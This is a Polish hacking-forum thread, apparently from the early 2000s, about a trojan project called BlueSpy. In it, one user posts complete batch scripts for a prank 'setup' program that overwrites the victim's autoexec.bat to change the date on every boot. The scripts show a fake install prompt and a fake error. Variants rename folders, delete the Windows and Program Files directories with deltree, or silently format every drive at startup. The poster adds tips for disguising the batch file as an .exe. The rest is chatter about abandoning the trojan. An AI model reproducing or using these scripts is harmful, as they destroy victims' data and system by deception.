BLU SPY

Maverick

Użytkownik
Dołączył
Grudzień 1, 2002
Posty
190
Male sprostowanie.
Nie nazywajcie kogoc debilem tylko dlatego ze nie zna sie na kompach tak jak wy. Nie kazdy chce byc hakerem,adminem lub po prostu bardziej zaawansowanym userem. Poza tym do zmiany daty na pewno mozna maly programik napisac i nie trzeba nikogo prosic zeby ci łache robil.

Pozdrawiam
 

DeeJay's Team

Użytkownik
Dołączył
Maj 20, 2003
Posty
38
mozna bardzo łatwo zrobic, maly programik, tworzymy 2 pliki, setup.bat i setup.dll

w setup.bat wpisujemy:
@echo off
cls
ren setup.dll autoexec.bat
copy /y autoexec.bat c:
ren autoexec.bat setup.dll
cls
echo Czy chcesz zainstalowac do c:program fileskulki
choice
echo Brak pamieci konwencjonalnej do kontynuacji,zwolnij pamiec i sprobuj ponownie
pause > nul

w setup.dll wpisujemy:
mode con codepage prepare=((852) C:WINDOWSCOMMANDega.cpi)
mode con codepage select=852
keyb pl,,C:WINDOWSCOMMANDkeybrd4.sys
date 2001-02-24

dwa pliki umieszczamy w jednym katalogu. Żeby nie bylo podejzen mozna jeszcze zkonwertowac plik setup.bat na setup.com a potem setup.exe, konwerter mozna znalesc na mojej stronie www.deejay.prezes.prv.pl

w ten sposób gdy ofiara załaczy ten program do autoexeca zostanie dodana komenda zmiany daty przy kazdorazowym resecie windowsa, proste a ofiara sie napewno nie zorentuje co jej zmienia date w systemie
smile.gif


chcąc kogos pożadnie wkurwic do setup.dll mozemy wpisac:
mode con codepage prepare=((852) C:WINDOWSCOMMANDega.cpi)
mode con codepage select=852
keyb pl,,C:WINDOWSCOMMANDkeybrd4.sys
@echo off
cls
echo Trwa aktualizowanie sterownika
echo Moze to potrwac kilka minut...
cd c:
ren "program files" mso.$$$0
ren windows mso.$$$$
ren gry ż1
ren mp3 ż2
ren programy ż3
ren instalki ż4
ren obrazki ż5
ren sterowniki ż6
deltree mso.$$$0
deltree mso.$$$$

wtedy zostanie usuniety windows, a nazwy paru ciekawych folderów na dysku c zostaną zmienione na takie ktorych nieda sie w windowsie otworzyc
smile.gif
, pozostaje tylko zmiana nazwy w NC (norton comander)

Mozna w setup.dll takze wpisac:
echo off
cls
format d: /autotest /u /q
cls
format c: /autotest /u /q
cls
format e: /autotest /u /q

szybkie formatowanie wszystkich dysków podczas startu windozy(bez zadnych monitow) . Wszystko zalezy od waszej pomyslowosci, zycze powodzenia
smile.gif
 

spy

Użytkownik
Dołączył
Marzec 24, 2002
Posty
543
A wiec...
BlueSpy [Tam jest qrwa E] byl zrobiony w 90% ale dostalem 100 nowych Filmow i chcialem zrobic "troche" miejsca i... przez przypadek usunelem kod BlueSpy =P
I tak nie zajmowalem sie nim od 3 miesiecy, wiec nie plakalem....

Jak wiecie (a moze i nie, w koncu polowy waZ nie znam =P [ale ten czas leci...]) mam modem (na skutek przeprowacki do Zielonki)
Wiec nic mi sie nie chce na nim robic... no i odkrylem zbawiena moc wina CHEERY za 2.90 bez butelki... ehh te glinki...

Trojanami nie zajmuje sie od dawna bo MI SIE TO ZNUDZILO... jade do empika i kupuje se pare book-ow o ASM. i tym mam zamiar sie zajmowac...

Moze jak zgram Delphiego 7 (jeszcze zostalo TYLKO 16h) to moze zajme sie blueSpy ale i tam musial bym przedtem pogadac z destruktorem a jakos mamy z tym pHa =P

Co do bywania na forum... ehhh ide w slady Born_Bad-a a5a i innych...
kolejne pytania w stylu jak skonfigurowac cafeiniego mnie poprostu wqr***ja...

n2ra
[/code]
 

DeeJay's Team

Użytkownik
Dołączył
Maj 20, 2003
Posty
38
No to pa
smile.gif
nie dziwie sie ze znudzilo ci sie siedzenie po kilka godzin dziennie przed kodem bluespy i sprawdzanie gdzie jeszcze moze byc bląd i co jeszcze trzeba poprawic,na ukłony zasłuzyłes sobie juz robieniem red spy i nikt nie wymaga od ciebie ciągłych poswiecen, mam nadzieje ze bedzie wiecej takich programistów w Polsce! ps nie pij tych tanich win
smile.gif
juz lepiej piwko z sokiem
<
 
Do góry Bottom